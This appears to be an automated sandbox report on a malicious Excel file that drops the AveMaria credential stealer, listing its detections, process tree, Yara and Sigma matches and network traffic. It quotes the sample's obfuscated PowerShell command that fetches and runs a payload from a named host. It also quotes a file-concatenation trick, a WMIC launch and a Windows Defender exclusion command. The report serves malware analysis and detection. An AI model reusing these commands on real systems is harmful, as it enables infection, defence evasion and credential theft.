Loading ...

Play interactive tourEdit tour

Analysis Report Telex06012020.xls

Overview

General Information

Sample Name:Telex06012020.xls
Analysis ID:337287
MD5:c221348cc4be1ca5c8d1fe510c672e57
SHA1:b7bbcb23c92782d871a684afc34e4c8264e96b8e
SHA256:07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected AveMaria stealer
Yara detected Generic Dropper
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to create processes via WMI
Contains functionality to hide user accounts
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6472 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 1836 cmdline: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5848 cmdline: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • csc.exe (PID: 6108 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 6504 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
        • cmd.exe (PID: 7036 cmdline: 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 6924 cmdline: 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • WMIC.exe (PID: 6992 cmdline: Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • Test3.jpg (PID: 6852 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)
    • Test3.jpg (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)
      • powershell.exe (PID: 5368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5384 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Telex06012020.xlsPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x1cf5e:$s1: poWeRSheLL.EXe
  • 0x1cf72:$s2: BYPAsS
Telex06012020.xlsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1cf5e:$s1: poWeRSheLL
Telex06012020.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\DCC40000PowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1c7e0:$s1: poWeRSheLL
    C:\Users\user\AppData\Local\Temp\Test1.txtCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    C:\Users\user\AppData\Local\Temp\Test1.txtCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x42de8:$c1: Elevation:Administrator!new:
    C:\Users\user\AppData\Local\Temp\Test3.jpgCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    C:\Users\user\AppData\Local\Temp\Test3.jpgCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x42de8:$c1: Elevation:Administrator!new:

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xde8:$c1: Elevation:Administrator!new:
    00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x2c8ac:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x2c8ac:$c1: Elevation:Administrator!new:
    00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x1d88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x4b90:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x1d88:$c1: Elevation:Administrator!new:
        • 0x4b90:$c1: Elevation:Administrator!new:
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        18.0.Test3.jpg.400000.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        18.0.Test3.jpg.400000.0.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x42de8:$c1: Elevation:Administrator!new:
        18.2.Test3.jpg.400000.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        18.2.Test3.jpg.400000.0.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x42de8:$c1: Elevation:Administrator!new:
        19.2.Test3.jpg.400000.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        Click to see the 31 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6472, ProcessCommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ProcessId: 1836
        Sigma detected: Suspicious Csc.exe Source File FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108
        Sigma detected: Group Modification LoggingShow sources
        Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
        Sigma detected: Local User CreationShow sources
        Source: Event LogsAuthor: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: .mFDHma, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x2005f, data 7: -, data 8: .mFDHma, data 9: %%1793

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgAvira: detection malicious, Label: TR/Redcap.ghjpt
        Source: C:\Users\user\AppData\Local\Temp\Test1.txtAvira: detection malicious, Label: TR/Redcap.ghjpt
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 22%Perma Link
        Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 41%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Telex06012020.xlsVirustotal: Detection: 12%Perma Link
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\Test1.txtJoe Sandbox ML: detected
        Source: 19.1.Test3.jpg.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
        Source: 18.2.Test3.jpg.2ae0000.1.unpackAvira: Label: TR/Redcap.ghjpt
        Source: 19.0.Test3.jpg.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
        Source: 22.2.cmd.exe.5250000.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 18.0.Test3.jpg.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
        Source: 18.2.Test3.jpg.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
        Source: 19.2.Test3.jpg.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
        Source: Binary string: RfxVmt.pdb source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: RfxVmt.pdbGCTL source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdbUGP source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp

        Software Vulnerabilities:

        barindex
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
        Source: global trafficDNS query: name: lankarecipes.com
        Source: global trafficTCP traffic: 192.168.2.4:49728 -> 192.185.236.165:80
        Source: global trafficTCP traffic: 192.168.2.4:49728 -> 192.185.236.165:80
        Source: global trafficTCP traffic: 192.168.2.4:49747 -> 37.46.150.86:5200
        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
        Source: global trafficHTTP traffic detected: GET /mages.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.86
        Source: global trafficHTTP traffic detected: GET /mages.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: lankarecipes.com
        Source: PowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.drString found in binary or memory: http://lankarecipes.com/mages.jp
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.drString found in binary or memory: http://stascorp.comDVarFileInfo$
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.office.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.onedrive.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://augloop.office.com
